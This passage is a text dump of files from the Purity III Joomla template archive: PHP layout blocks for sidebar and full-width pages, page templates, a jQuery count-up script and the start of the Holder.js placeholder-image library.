</div> PKԜ�\�4Y4purity_iii/tpls/blocks/mainbody/two-sidebar-left.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>
<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12 col-sm-8 col-sm-push-4 col-md-6 col-md-push-6">
			<?php if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

		<div class="t3-sidebar col-xs-12 col-sm-4 col-sm-pull-8 col-md-6 col-md-pull-6">
			<div class="row">

				<!-- MASSCOL 1 -->
				<?php if ($vars['mastcol']) : ?>
					<div class="t3-mastcol t3-mastcol-1 <?php $this->_c($vars['mastcol']) ?>">
						<jdoc:include type="modules" name="<?php $this->_p($vars['mastcol']) ?>" style="T3Xhtml" />
					</div>
				<?php endif ?>
				<!-- //MASSCOL 1 -->

				<!-- SIDEBAR 1 -->
				<div class="t3-sidebar t3-sidebar-1 col-xs-12 col-md-6 <?php $this->_c($vars['sidebar1']) ?>">
					<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar1']) ?>" style="T3Xhtml" />
				</div>
				<!-- //SIDEBAR 1 -->
			
				<!-- SIDEBAR 2 -->
				<div class="t3-sidebar t3-sidebar-2 col-xs-12 col-md-6 <?php $this->_c($vars['sidebar2']) ?>">
					<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar2']) ?>" style="T3Xhtml" />
				</div>
				<!-- //SIDEBAR 2 -->

			</div>
		</div>

	</div>
</div> PKԜ�\�81$$5purity_iii/tpls/blocks/mainbody/two-sidebar-right.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mainbody 3 columns, content in center: content - sidebar1 - sidebar2
 */
?>

<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12 col-sm-8 col-md-6">
			<?php if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

		<div class="t3-sidebar col-xs-12 col-sm-4 col-md-6">
			<div class="row">

				<?php if ($vars['mastcol']) : ?>
					<!-- MASSCOL 1 -->
					<div class="t3-mastcol t3-mastcol-1 <?php $this->_c($vars['mastcol']) ?>">
						<jdoc:include type="modules" name="<?php $this->_p($vars['mastcol']) ?>" style="T3Xhtml" />
					</div>
					<!-- //MASSCOL 1 -->
				<?php endif ?>

				<!-- SIDEBAR 1 -->
				<div class="t3-sidebar t3-sidebar-1 col-xs-12 col-md-6 <?php $this->_c($vars['sidebar1']) ?>">
					<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar1']) ?>" style="T3Xhtml" />
				</div>
				<!-- //SIDEBAR 1 -->
			
				<!-- SIDEBAR 2 -->
				<div class="t3-sidebar t3-sidebar-2 col-xs-12 col-md-6 <?php $this->_c($vars['sidebar2']) ?>">
					<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar2']) ?>" style="T3Xhtml" />
				</div>
				<!-- //SIDEBAR 2 -->
	
			</div>
		</div>

	</div>
</div> PKԜ�\��bb.purity_iii/tpls/blocks/mainbody/no-sidebar.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mainbody 1 columns, content only
 */
?>

<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12">
			<?php //if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php //endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

	</div>
</div> PKԜ�\��د��5purity_iii/tpls/blocks/mainbody/one-sidebar-right.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mainbody 2 columns: content - sidebar
 */
?>
<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12 col-sm-8  col-md-9">
			<?php if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

		<!-- SIDEBAR RIGHT -->
		<div class="t3-sidebar t3-sidebar-right col-xs-12 col-sm-4  col-md-3 <?php $this->_c($vars['sidebar']) ?>">
			<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar']) ?>" style="T3Xhtml" />
		</div>
		<!-- //SIDEBAR RIGHT -->

	</div>
</div> 
PKԜ�\d6j)jjApurity_iii/tpls/blocks/mainbody/one-sidebar-left-with-mastcol.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mainbody 2 columns: sidebar - content
 */
?>
<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12 col-sm-8 col-sm-push-4 col-md-9 col-md-push-3">
			<?php if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

		<div class="t3-sidebar t3-sidebar-left col-xs-12 col-sm-4 col-sm-pull-8 col-md-3 col-md-pull-9">
			<div class="row">

				<!-- MASSCOL 1 -->
				<?php if ($vars['mastcol']) : ?>
					<div class="t3-mastcol t3-mastcol-1 <?php $this->_c($vars['mastcol']) ?>">
						<jdoc:include type="modules" name="<?php $this->_p($vars['mastcol']) ?>" style="T3Xhtml" />
					</div>
				<?php endif ?>
				<!-- //MASSCOL 1 -->

				<!-- SIDEBAR LEFT -->
				<?php if ($vars['sidebar']) : ?>
				<div class="t3-sidebar col-xs-12 <?php $this->_c($vars['sidebar']) ?>">
					<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar']) ?>" style="T3Xhtml" />
				</div>
				<?php endif ?>
				<!-- //SIDEBAR LEFT -->
			</div>
		</div>

	</div>
</div> PKԜ�\�yw��4purity_iii/tpls/blocks/mainbody/one-sidebar-left.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mainbody 2 columns: sidebar - content
 */
?>
<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12 col-sm-8 col-sm-push-4 col-md-9 col-md-push-3">
			<?php if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

		<!-- SIDEBAR LEFT -->
		<div class="t3-sidebar t3-sidebar-left col-xs-12 col-sm-4 col-sm-pull-8 col-md-3 col-md-pull-9 <?php $this->_c($vars['sidebar']) ?>">
			<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar']) ?>" style="T3Xhtml" />
		</div>
		<!-- //SIDEBAR LEFT -->

	</div>
</div> PKԜ�\��j��.purity_iii/tpls/blocks/mainbody/full-width.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

if (is_array($this->getParam('skip_component_content')) && 
  in_array(JFactory::getApplication()->input->getInt('Itemid'), $this->getParam('skip_component_content'))) 
return;

/**
 * Mainbody 1 columns, content only
 */
?>

<div id="t3-mainbody" class="t3-mainbody">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content">
			<?php //if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php //endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

</div> PKԜ�\�ޙ�/purity_iii/tpls/blocks/mainbody/two-sidebar.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mainbody 3 columns, content in center: sidebar1 - content - sidebar2
 */
?>

<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12 col-md-6  col-md-push-3">
			<?php if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

		<!-- SIDEBAR 1 -->
		<div class="t3-sidebar t3-sidebar-1 col-xs-12 col-md-3  col-md-pull-6 <?php $this->_c($vars['sidebar1']) ?>">
			<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar1']) ?>" style="T3Xhtml" />
		</div>
		<!-- //SIDEBAR 1 -->
	
		<!-- SIDEBAR 2 -->
		<div class="t3-sidebar t3-sidebar-2 col-xs-12 col-md-3 <?php $this->_c($vars['sidebar2']) ?>">
			<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar2']) ?>" style="T3Xhtml" />
		</div>
		<!-- //SIDEBAR 2 -->
	
	</div>
</div> PKԜ�\��_��(purity_iii/tpls/default-content-left.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
 
$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
</head>

<body>

<div class="t3-wrapper"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

  <?php $this->loadBlock('header') ?>

  <?php $this->loadBlock('spotlight-1') ?>

  <?php $this->loadBlock('mainbody-content-left') ?>

  <?php $this->loadBlock('spotlight-2') ?>

  <?php $this->loadBlock('navhelper') ?>

  <?php $this->loadBlock('footer') ?>

</div>

</body>

</html>PKԜ�\n�����purity_iii/tpls/default.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
 
$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
</head>

<body>

<div class="t3-wrapper"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

  <?php $this->loadBlock('header') ?>

  <?php $this->loadBlock('spotlight-1') ?>

  <?php $this->loadBlock('mainbody') ?>

  <?php $this->loadBlock('spotlight-2') ?>

  <?php $this->loadBlock('navhelper') ?>

  <?php $this->loadBlock('footer') ?>

</div>

</body>

</html>PKԜ�\��
hh$purity_iii/tpls/features-intro-2.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
  $app = JFactory::getApplication();
  $menu = $app->getMenu();
  $lang = JFactory::getLanguage();
  $hide_mainbody = (!$this->params->get("ZEN_MAINBODY_DISABLED",true)==false && ($menu->getActive() == $menu->getDefault( $lang->getTag() )));

  $thisClass = get_class($this) ;
  if($thisClass == "T3TemplateLayout") {
    $hide_mainbody = 0;
  }

  // Detecting Active Variables
  $option   = $app->input->getCmd('option', '');
  $view     = $app->input->getCmd('view', '');
  $layout   = $app->input->getCmd('layout', '');
  $task     = $app->input->getCmd('task', '');
  $itemid   = $app->input->getCmd('Itemid', '');
  $sitename = $app->get('sitename');
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
</head>

<body>

<div class="t3-wrapper features-intro features-intro-2"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

	<?php $this->loadBlock('header') ?>

  <?php if(!$hide_mainbody || $option == "com_config") {
    $this->loadBlock ('mainbody');
  } ?>

	<?php $this->loadBlock('features-intro-2') ?>

	<?php $this->loadBlock('footer') ?>

</div>


</body>
</html>PKԜ�\�t��purity_iii/tpls/magazine.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
	<?php $this->addCss('layouts/magazine') ?>
</head>

<body>

<div class="t3-wrapper magazine"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

	<?php $this->loadBlock('header') ?>

	<?php $this->loadBlock('mainbody') ?>

  <?php $this->loadBlock('navhelper') ?>

	<?php $this->loadBlock('footer') ?>

</div>


</body>
</html>PKԜ�\',��purity_iii/tpls/portfolio.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
	<?php $this->addCss('layouts/porfolio') ?>
</head>

<body>

<div class="t3-wrapper porfolio"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

	<?php $this->loadBlock('header') ?>

	<?php $this->loadBlock('mainbody') ?>

	<?php $this->loadBlock('footer') ?>

</div>


</body>
</html>PKԜ�\t=��TTpurity_iii/component.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// no direct access
defined ( '_JEXEC' ) or die ( 'Restricted access' );

include(dirname(__FILE__) . '/index.php');

T3::getApp()->addCss('windows');PKԜ�\��*`LLpurity_iii/js/script.jsnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

// count up
(function($) {
	
	function CountUp(element, options){
		this.$element  = $(element);
		this.$counter  = this.$element.find('.count-up');
		this.$progress = this.$element.find('.pro-bar');
		this.options   = options;
		this.value     = options.from;
		this.$element
			.on('mouseenter', $.proxy(this.run, this));
	}

	CountUp.prototype = {
		run: function(){
			
			if(this.$element.hasClass('start')){
				return;
			}
			this.$element.addClass('start');
			this.$counter.stop(true).css('display', 'block').fadeTo(250, 1).siblings('.face').css('display', 'none');
			$(this).stop(true).animate({
				value: this.options.to
			}, {
				step: function(now){
					this.$counter.html(Math.round(now) + '%');
				},
				duration: this.options.duration,
				complete: function(){

					setTimeout($.proxy(function(){
						this.$counter.delay(250).parent().children().css({display: '', opacity: ''});
						this.$progress.css('display', '');
					}, this), 250);
					
					//clean
					this.$element.off('mouseenter');
				}
			});

			this.$progress.css({width: '0%', display: 'block'}).animate({
				width: this.options.to + '%'
			}, this.options.duration);
		}
	}

	CountUp.defaults = {
		from: 0,
		to: 100,
		duration: 2000
	}

	$.fn.countup = function (option) {
    return this.each(function () {
      var 
      	$this   = $(this),
      	data    = $this.data('countup'),
      	options = $.extend({}, CountUp.defaults, $this.data(), typeof option == 'object' && option),
      	action  = typeof option == 'string' ? option : false;

      if (!data){
      	$this.data('countup', (data = new CountUp(this, options)))
      }

      if (action && data[action]){
      	data[action]()
      }
    })
  }

})(jQuery);

// kickstart
(function($){

	$(document).ready(function(){
		// fix mega menu 
		 $('.t3-navbar .t3-megamenu ul li > a').click(function(e){
    	if ($(this).hasClass('dropdown-toggle')) {
    		window.location.href = $(this).attr('href');
    	}
    });
		
		//init count up
		(function(){
			$('[data-js="count-up"]').countup();
		})();
	});

})(jQuery);


PKԜ�\�.W��M�Mpurity_iii/js/holder.jsnu&1i�/*

Holder - 2.3 - client side image placeholders
(c) 2012-2014 Ivan Malopinsky / http://imsky.co

Provided under the MIT License.
Commercial use requires attribution.

*/
var Holder = Holder || {};
(function (app, win) {

var system_config = {
	use_svg: false,
	use_canvas: false,
	use_fallback: false
};
var instance_config = {};
var preempted = false;
canvas = document.createElement('canvas');
var dpr = 1, bsr = 1;
var resizable_images = [];

if (!canvas.getContext) {
	system_config.use_fallback = true;
} else {
	if (canvas.toDataURL("image/png")
		.indexOf("data:image/png") < 0) {
		//Android doesn't support data URI
		system_config.use_fallback = true;
	} else {
		var ctx = canvas.getContext("2d");
	}
}

if(!!document.createElementNS && !!document.createElementNS('http://www.w3.org/2000/svg', 'svg').createSVGRect){
	system_config.use_svg = true;
	system_config.use_canvas = false;
}

if(!system_config.use_fallback){
    dpr = window.devicePixelRatio || 1,
    bsr = ctx.webkitBackingStorePixelRatio || ctx.mozBackingStorePixelRatio || ctx.msBackingStorePixelRatio || ctx.oBackingStorePixelRatio || ctx.backingStorePixelRatio || 1;
}

var ratio = dpr / bsr;

var settings = {
	domain: "holder.js",
	images: "img",
	bgnodes: ".holderjs",
	themes: {
		"gray": {
			background: "#eee",
			foreground: "#aaa",
			size: 12
		},
		"social": {
			background: "#3a5a97",
			foreground: "#fff",
			size: 12
		},
		"industrial": {
			background: "#434A52",
			foreground: "#C2F200",
			size: 12
		},
		"sky": {
			background: "#0D8FDB",
			foreground: "#fff",
			size: 12
		},
		"vine": {
			background: "#39DBAC",
			foreground: "#1E292C",
			size: 12
		},
		"lava": {
			background: "#F8591A",
			foreground: "#1C2846",
			size: 12
		}
	},
	stylesheet: ""
};
app.flags = {
	dimensions: {
		regex: /^(\d+)x(\d+)$/,
		output: function (val) {
			var exec = this.regex.exec(val);
			return {
				width: +exec[1],
				height: +exec[2]
			}
		}
	},
	fluid: {
		regex: /^([0-9%]+)x([0-9%]+)$/,
		output: function (val) {
			var exec = this.regex.exec(val);
			return {
				width: exec[1],
				height: exec[2]
			}
		}
	},
	colors: {
		regex: /#([0-9a-f]{3,})\:#([0-9a-f]{3,})/i,
		output: function (val) {
			var exec = this.regex.exec(val);
			return {
				size: settings.themes.gray.size,
				foreground: "#" + exec[2],
				background: "#" + exec[1]
			}
		}
	},
	text: {
		regex: /text\:(.*)/,
		output: function (val) {
			return this.regex.exec(val)[1];
		}
	},
	font: {
		regex: /font\:(.*)/,
		output: function (val) {
			return this.regex.exec(val)[1];
		}
	},
	auto: {
		regex: /^auto$/
	},
	textmode: {
		regex: /textmode\:(.*)/,
		output: function(val){
			return this.regex.exec(val)[1];
		}
	}
}

function text_size(width, height, template) {
	height = parseInt(height, 10);
	width = parseInt(width, 10);
	var bigSide = Math.max(height, width)
	var smallSide = Math.min(height, width)
	var scale = 1 / 12;
	var newHeight = Math.min(smallSide * 0.75, 0.75 * bigSide * scale);
	return {
		height: Math.round(Math.max(template.size, newHeight))
	}
}

var svg_el = (function(){
	var serializer = new XMLSerializer();
	var svg_ns = "http://www.w3.org/2000/svg"
	var svg = document.createElementNS(svg_ns, "svg");
	svg.setAttribute("xmlns", "http://www.w3.org/2000/svg")
	svg.setAttribute("xmlns:xlink", "http://www.w3.org/1999/xlink");
	var bg_el = document.createElementNS(svg_ns, "rect")
	var text_el = document.createElementNS(svg_ns, "text")
	var textnode_el = document.createTextNode(null)
	text_el.setAttribute("text-anchor", "middle")
	text_el.appendChild(textnode_el)
	svg.appendChild(bg_el)
	svg.appendChild(text_el)
		
	return function(props){
		svg.setAttribute("width",props.width);
		svg.setAttribute("height", props.height);
		bg_el.setAttribute("width", props.width);
		bg_el.setAttribute("height", props.height);
		bg_el.setAttribute("fill", props.template.background);
		text_el.setAttribute("x", props.width/2)
		text_el.setAttribute("y", props.height/2)
		textnode_el.nodeValue=props.text
		text_el.setAttribute("style", css_properties({
		"fill": props.template.foreground,
		"font-weight": "bold",
		"font-size": props.text_height+"px",
		"font-family":props.font,
		"dominant-baseline":"central"
		}))
		return serializer.serializeToString(svg)
	}
})()

function css_properties(props){
	var ret = [];
	for(p in props){
		if(props.hasOwnProperty(p)){
			ret.push(p+":"+props[p])
		}
	}
	return ret.join(";")
}

function draw_canvas(args) {
	var ctx = args.ctx,
		dimensions = args.dimensions,
		template = args.template,
		ratio = args.ratio,
		holder = args.holder,
		literal = holder.textmode == "literal",
		exact = holder.textmode == "exact";

	var ts = text_size(dimensions.width, dimensions.height, template);
	var text_height = ts.height;
	var width = dimensions.width * ratio,
		height = dimensions.height * ratio;
	var font = template.font ? template.font : "Arial,Helvetica,sans-serif";
	canvas.width = width;
	canvas.height = height;
	ctx.textAlign = "center";
	ctx.textBaseline = "middle";
	ctx.fillStyle = template.background;
	ctx.fillRect(0, 0, width, height);
	ctx.fillStyle = template.foreground;
	ctx.font = "bold " + text_height + "px " + font;
	var text = template.text ? template.text : (Math.floor(dimensions.width) + "x" + Math.floor(dimensions.height));
	if (literal) {
		var dimensions = holder.dimensions;
		text = dimensions.width + "x" + dimensions.height;
	}
	else if(exact && holder.exact_dimensions){
		var dimensions = holder.exact_dimensions;
		text = (Math.floor(dimensions.width) + "x" + Math.floor(dimensions.height));
	}
	var text_width = ctx.measureText(text).width;
	if (text_width / width >= 0.75) {
		text_height = Math.floor(text_height * 0.75 * (width / text_width));
	}
	//Resetting font size if necessary
	ctx.font = "bold " + (text_height * ratio) + "px " + font;
	ctx.fillText(text, (width / 2), (height / 2), width);
	return canvas.toDataURL("image/png");
}

function draw_svg(args){
	var dimensions = args.dimensions,
		template = args.template,
		holder = args.holder,
		literal = holder.textmode == "literal",
		exact = holder.textmode == "exact";

	var ts = text_size(dimensions.width, dimensions.height, template);
	var text_height = ts.height;
	var width = dimensions.width,
		height = dimensions.height;
		
	var font = template.font ? template.font : "Arial,Helvetica,sans-serif";
	var text = template.text ? template.text : (Math.floor(dimensions.width) + "x" + Math.floor(dimensions.height));
	
	if (literal) {
		var dimensions = holder.dimensions;
		text = dimensions.width + "x" + dimensions.height;
	}
	else if(exact && holder.exact_dimensions){
		var dimensions = holder.exact_dimensions;
		text = (Math.floor(dimensions.width) + "x" + Math.floor(dimensions.height));
	}
	var string = svg_el({
		text: text, 
		width:width, 
		height:height, 
		text_height:text_height, 
		font:font, 
		template:template
	})
	return "data:image/svg+xml;base64,"+btoa(string);
}

function draw(args) {
	if(instance_config.use_canvas && !instance_config.use_svg){
		return draw_canvas(args);
	}
	else{
		return draw_svg(args);
	}
}

function render(mode, el, holder, src) {
	var dimensions = holder.dimensions,
		theme = holder.theme,
		text = holder.text ? decodeURIComponent(holder.text) : holder.text;
	var dimensions_caption = dimensions.width + "x" + dimensions.height;
	theme = (text ? extend(theme, {
		text: text
	}) : theme);
	theme = (holder.font ? extend(theme, {
		font: holder.font
	}) : theme);
	el.setAttribute("data-src", src);
	holder.theme = theme;
	el.holder_data = holder;
	
	if (mode == "image") {
		el.setAttribute("alt", text ? text : theme.text ? theme.text + " [" + dimensions_caption + "]" : dimensions_caption);
		if (instance_config.use_fallback || !holder.auto) {
			el.style.width = dimensions.width + "px";
			el.style.height = dimensions.height + "px";
		}
		if (instance_config.use_fallback) {
			el.style.backgroundColor = theme.background;
		} else {
			el.setAttribute("src", draw({ctx: ctx, dimensions: dimensions, template: theme, ratio:ratio, holder: holder}));
			
			if(holder.textmode && holder.textmode == "exact"){
				resizable_images.push(el);
				resizable_update(el);
			}
			
		}
	} else if (mode == "background") {
		if (!instance_config.use_fallback) {
			el.style.backgroundImage = "url(" + draw({ctx:ctx, dimensions: dimensions, template: theme, ratio: ratio, holder: holder}) + ")";
			el.style.backgroundSize = dimensions.width + "px " + dimensions.height + "px";
		}
	} else if (mode == "fluid") {
		el.setAttribute("alt", text ? text : theme.text ? theme.text + " [" + dimensions_caption + "]" : dimensions_caption);
		if (dimensions.height.slice(-1) == "%") {
			el.style.height = dimensions.height
		} else if(holder.auto == null || !holder.auto){
			el.style.height = dimensions.height + "px"
		}
		if (dimensions.width.slice(-1) == "%") {
			el.style.width = dimensions.width
		} else if(holder.auto == null || !holder.auto){
			el.style.width = dimensions.width + "px"
		}
		if (el.style.display == "inline" || el.style.display === "" || el.style.display == "none") {
			el.style.display = "block";
		}
		
		set_initial_dimensions(el)
		
		if (instance_config.use_fallback) {
			el.style.backgroundColor = theme.background;
		} else {
			resizable_images.push(el);
			resizable_update(el);
		}
	}
}

function dimension_check(el, callback) {
	var dimensions = {
		height: el.clientHeight,
		width: el.clientWidth
	};
	if (!dimensions.height && !dimensions.width) {
		el.setAttribute("data-holder-invisible", true)
		callback.call(this, el)
	}
	else{
		el.removeAttribute("data-holder-invisible")
		return dimensions;
	}
}

function set_initial_dimensions(el){
	if(el.holder_data){
		var dimensions = dimension_check(el, app.invisible_error_fn( set_initial_dimensions))
		if(dimensions){
			var holder = el.holder_data;
			holder.initial_dimensions = dimensions;
			holder.fluid_data = {
				fluid_height: holder.dimensions.height.slice(-1) == "%",
				fluid_width: holder.dimensions.width.slice(-1) == "%",
				mode: null
			}
			if(holder.fluid_data.fluid_width && !holder.fluid_data.fluid_height){
				holder.fluid_data.mode = "width"
				holder.fluid_data.ratio = holder.initial_dimensions.width / parseFloat(holder.dimensions.height)
			}
			else if(!holder.fluid_data.fluid_width && holder.fluid_data.fluid_height){
				holder.fluid_data.mode = "height";
				holder.fluid_data.ratio = parseFloat(holder.dimensions.width) / holder.initial_dimensions.height
			}
		}
	}
}

function resizable_update(element) {
	var images;
	if (element.nodeType == null) {
		images = resizable_images;
	} else {
		images = [element]
	}
	for (var i in images) {
		if (!images.hasOwnProperty(i)) {
			continue;
		}
		var el = images[i]
